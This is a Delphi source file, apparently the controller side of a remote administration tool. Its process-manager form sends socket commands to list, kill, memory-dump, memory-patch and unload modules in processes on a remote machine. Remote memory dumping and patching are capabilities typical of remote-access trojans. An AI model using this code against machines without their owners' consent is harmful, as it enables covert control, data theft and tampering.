📄 unitprocesses.pas
字号:
if Processes.TreeNode.Item[0].Text = '' then Processes.TreeNode.Item[0].Text := '路径: ' + ExtractFilePath(LowerCase(string(PModuleEntry32(Buffer)^.szExePath)));
if Length(Processes.TreeNode.Item[0].Text) = 6 then Processes.TreeNode.Item[0].Delete;
end;
NewNode := Processes.TreeView1.Items.AddChild(Processes.LastModNode, ExtractFileName(LowerCase(string(PModuleEntry32(Buffer)^.szModule))));
ListData := New(PListData);
ListData.PID := dword(PListData(Processes.LastModNode.Data).Extra);
ListData.Hwnd := 0;
ListData.Module := NewNode.Text;
NewNode.Data := ListData;
if Length(ExtractFilePath(LowerCase(string(PModuleEntry32(Buffer)^.szExePath)))) > 1 then Processes.TreeView1.Items.AddChild(NewNode, '路径: ' + ExtractFilePath(LowerCase(string(PModuleEntry32(Buffer)^.szExePath))));
Processes.TreeView1.Items.AddChild(NewNode, '基大小: ' + IntToStr(PModuleEntry32(Buffer)^.modBaseSize));
Processes.TreeView1.Items.AddChild(NewNode, '基映象大小: ' + IntToStr(PModuleEntry32(Buffer)^.hModule));
end;
P_DUMP:
begin
Save := TSaveDialog.Create(nil);
Save.Title := '保存到文件';
if Save.Execute then
Stream.SaveToFile(Save.FileName);
Save.Free;
end;
P_LOCK:
begin
Processes.PopupMenu1.Tag := 1;
Processes.TreeView1.Items.Clear;
end;
P_UNLOCK:
begin
Processes.PopupMenu1.Tag := 0;
end;
end;
Socket := nil;
end;
end;
procedure TProcesses.Disconnect(var Socket: TCustomWinSocket; Data: Pointer);
var
Processes: TProcesses;
begin
Processes := TProcesses(Data);
if Processes.DataSocket = Socket then
begin
Processes.Connected := False;
Processes.BitBtn1.Caption:= '己断开';
Socket := nil;
Processes.DataSocket := nil;
end;
end;
procedure TProcesses.FormCreate(Sender: TObject);
begin
DataSocket := nil;
ConnectNotifyInfo := TNotifyInfo.Create;
ConnectNotifyInfo.Data := Self;
ConnectNotifyInfo.Callback := @TProcesses.Connect;
Main.NotifyConnectList.Add(ConnectNotifyInfo);
ReadNotifyInfo := TNotifyInfo.Create;
ReadNotifyInfo.Data := Self;
ReadNotifyInfo.Callback := @TProcesses.Read;
Main.NotifyReadList.Add(ReadNotifyInfo);
DisconnectNotifyInfo := TNotifyInfo.Create;
DisconnectNotifyInfo.Data := Self;
DisconnectNotifyInfo.Callback := @TProcesses.Disconnect;
Main.NotifyDisconnectList.Add(DisconnectNotifyInfo);
end;
procedure TProcesses.TreeView1Click(Sender: TObject);
begin
if not Assigned(TreeView1.Selected) then Exit;
dwPID := 0;
dwHWND := 0;
szModule := '';
if Assigned(TreeView1.Selected.Data) then
begin
dwPID := PListData(TreeView1.Selected.Data).PID;
dwHWND := PListData(TreeView1.Selected.Data).Hwnd;
szModule := PListData(TreeView1.Selected.Data).Module;
end;
end;
procedure TProcesses.Refresh1Click(Sender: TObject);
var
CommandFrame: TCommandFrame;
ReplyStream: TMemoryStream;
begin
if not SocketConnected then Exit;
TreeView1.Items.Clear;
CommandFrame.len := 0;
CommandFrame.Command := P_LIST;
CommandFrame.ID := FRAME_ID;
ReplyStream := TMemoryStream.Create;
ReplyStream.WriteBuffer(CommandFrame, SizeOf(TCommandFrame));
Main.SendStream(DataSocket, ReplyStream);
end;
procedure TProcesses.MemoryDump1Click(Sender: TObject);
var
Address, Size: string;
dwAddress, dwSize: dword;
CommandFrame: TCommandFrame;
ReplyStream: TMemoryStream;
begin
if not SocketConnected then Exit;
Address := InputBox('内存信息', '请输入一个启动地址的数值', '');
if Length(Address) = 0 then Exit;
Size := InputBox('内存信息', '请输入内存地址大小', '');
if Length(Size) = 0 then Exit;
dwAddress := StrToInt(Address);
dwSize := StrToInt(Size);
CommandFrame.len := SizeOf(dword) * 3;
CommandFrame.Command := P_DUMP;
CommandFrame.ID := FRAME_ID;
ReplyStream := TMemoryStream.Create;
ReplyStream.WriteBuffer(CommandFrame, SizeOf(TCommandFrame));
ReplyStream.WriteBuffer(dwPID, SizeOf(dword));
ReplyStream.WriteBuffer(dwAddress, SizeOf(dword));
ReplyStream.WriteBuffer(dwSize, SizeOf(dword));
Main.SendStream(DataSocket, ReplyStream);
end;
procedure TProcesses.KillProcess1Click(Sender: TObject);
var
CommandFrame: TCommandFrame;
ReplyStream: TMemoryStream;
begin
if not SocketConnected then Exit;
CommandFrame.len := SizeOf(dword);
CommandFrame.Command := P_KILL;
CommandFrame.ID := FRAME_ID;
ReplyStream := TMemoryStream.Create;
ReplyStream.WriteBuffer(CommandFrame, SizeOf(TCommandFrame));
ReplyStream.WriteBuffer(dwPID, SizeOf(dword));
Main.SendStream(DataSocket, ReplyStream);
if Assigned(TreeView1.Selected) then TreeView1.Selected.Delete;
end;
procedure TProcesses.SaveToFile1Click(Sender: TObject);
var
SaveDialog: TSaveDialog;
begin
SaveDialog := TSaveDialog.Create(Application);
SaveDialog.DefaultExt := 'txt';
SaveDialog.Title := '保存进程列表到文件';
if not SaveDialog.Execute then Exit;
TreeView1.SaveToFile(SaveDialog.FileName);
end;
procedure TProcesses.PopupMenu1Popup(Sender: TObject);
begin
Refresh1.Visible := (PopupMenu1.Tag <> 1) ;
KillProcess1.Visible := dwPID <> 0;
MemoryDump1.Visible := dwPID <> 0;
PatchMemory1.Visible := dwPID <> 0;
end;
procedure TProcesses.PatchMemory1Click(Sender: TObject);
var
Address: string;
dwAddress: dword;
CommandFrame: TCommandFrame;
ReplyStream: TMemoryStream;
Open: TOpenDialog;
PatchStream: TMemoryStream;
begin
if not SocketConnected then Exit;
Address := InputBox('内存路径', '请输入一个内存启动地址的数值', '');
if Length(Address) = 0 then Exit;
dwAddress := StrToInt(Address);
Open := TOpenDialog.Create(nil);
Open.Title := '选择地址对应的文件下载';
if not Open.Execute then Exit;
PatchStream := TMemoryStream.Create;
PatchStream.LoadFromFile(Open.FileName);
CommandFrame.len := SizeOf(dword) * 2 + PatchStream.Size;
CommandFrame.Command := P_PATCH;
CommandFrame.ID := FRAME_ID;
ReplyStream := TMemoryStream.Create;
ReplyStream.WriteBuffer(CommandFrame, SizeOf(TCommandFrame));
ReplyStream.WriteBuffer(dwPID, SizeOf(dword));
ReplyStream.WriteBuffer(dwAddress, SizeOf(dword));
ReplyStream.CopyFrom(PatchStream, 0);
Main.SendStream(DataSocket, ReplyStream);
PatchStream.Free;
end;
procedure TProcesses.FormClose(Sender: TObject; var Action: TCloseAction);
var
Socket: TCustomWinSocket;
begin
Main.NotifyConnectList.Delete(Main.NotifyConnectList.IndexOf(ConnectNotifyInfo));
Main.NotifyReadList.Delete(Main.NotifyReadList.IndexOf(ReadNotifyInfo));
Main.NotifyDisconnectList.Delete(Main.NotifyDisconnectList.IndexOf(DisconnectNotifyInfo));
WindowItem.Delete;
if DataSocket <> nil then
begin
if not SocketConnected then
begin
Socket := DataSocket;
DataSocket := nil;
Connected := False;
Socket.Close;
end;
end;
end;
procedure TProcesses.FormDeactivate(Sender: TObject);
begin
if WindowState = wsMinimized then Hide;
end;
procedure TProcesses.UnloadModule1Click(Sender: TObject);
var
CommandFrame: TCommandFrame;
ReplyStream: TMemoryStream;
DataLen: dword;
begin
if not SocketConnected then Exit;
DataLen := Length(szModule);
CommandFrame.len := DataLen + 9;
CommandFrame.Command := P_UNLOAD;
CommandFrame.ID := FRAME_ID;
ReplyStream := TMemoryStream.Create;
ReplyStream.WriteBuffer(CommandFrame, SizeOf(TCommandFrame));
ReplyStream.WriteBuffer(dwPID, 4);
ReplyStream.WriteBuffer(DataLen, 4);
ReplyStream.WriteBuffer(Pointer(szModule)^, DataLen);
Main.SendStream(DataSocket, ReplyStream);
if Assigned(TreeView1.Selected) then TreeView1.Selected.Delete;
end;
procedure TProcesses.FormShow(Sender: TObject);
begin
SetWindowLong(BitBtn1.Handle, GWL_STYLE, WS_CHILD or WS_VISIBLE or BS_FLAT);
SetWindowLong(BitBtn2.Handle, GWL_STYLE, WS_CHILD or WS_VISIBLE or BS_FLAT);
SetWindowLong(BitBtn3.Handle, GWL_STYLE, WS_CHILD or WS_VISIBLE or BS_FLAT);
end;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -